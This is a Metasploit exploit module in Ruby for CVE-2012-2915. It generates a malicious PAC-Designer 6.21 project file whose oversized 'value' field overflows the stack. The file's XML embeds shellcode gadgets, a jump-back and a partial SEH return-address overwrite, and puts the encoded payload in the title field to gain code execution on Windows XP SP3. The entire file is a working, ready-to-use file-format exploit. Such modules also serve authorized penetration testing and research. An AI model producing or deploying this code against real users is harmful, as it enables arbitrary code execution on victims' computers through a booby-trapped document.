##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
				6.21.  As a .pac file, when supplying a long string of data to the 'value' field
				under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
				on the stack, which results in arbitrary code execution under the context of the
				user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Unknown',      #Discovery
					'juan vazquez', #Metasploit
					'sinn3r'        #Metasploit
				],
			'References'     =>
				[
					['CVE', '2012-2915'],
					['OSVDB', '82001'],
					['EDB', '19006'],
					['BID', '53566'],
					['URL', 'http://secunia.com/advisories/48741']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x3c\x3e",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "seh"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'PAC-Designer 6.21 on Windows XP SP3',
						{
							# P/P/R in PACD621.exe
							# ASLR: False, Rebase: False, SafeSEH: False, OS: False
							'Ret' => 0x00805020
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 16 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
			], self.class)
	end

	def exploit
		# The payload is placed in the <title> field
		p = payload.encoded

		# The trigger is placed in the <value> field, which will jmp to our
		# payload in the <title> field.
		buf  = "\x5f"    #POP EDI
		buf << "\x5f"    #POP EDI
		buf << "\x5c"    #POP ESP
		buf << "\x61"*6  #POPAD x 6
		buf << "\x51"    #PUSH ECX
		buf << "\xc3"    #RET
		buf << rand_text_alpha(96-buf.length, payload_badchars)
		buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
		buf << [target.ret].pack('V')[0,3] # Partial overwrite

		xml = %Q|<?xml version="1.0"?>
<PacDesignData>
	<DocFmtVersion>1</DocFmtVersion>
	<DeviceType>ispPAC-CLK5410D</DeviceType>
	<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
	<SummaryInformation>
		<Title>#{p}</Title>
		<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
	</SummaryInformation>

	<SymbolicSchematicData>
		<Symbol>
			<SymKey>153</SymKey>
			<NameText>Profile 0 Ref Frequency</NameText>
			<Value>#{buf}</Value>
		</Symbol>
	</SymbolicSchematicData>
</PacDesignData>|

		file_create(xml)
	end
end

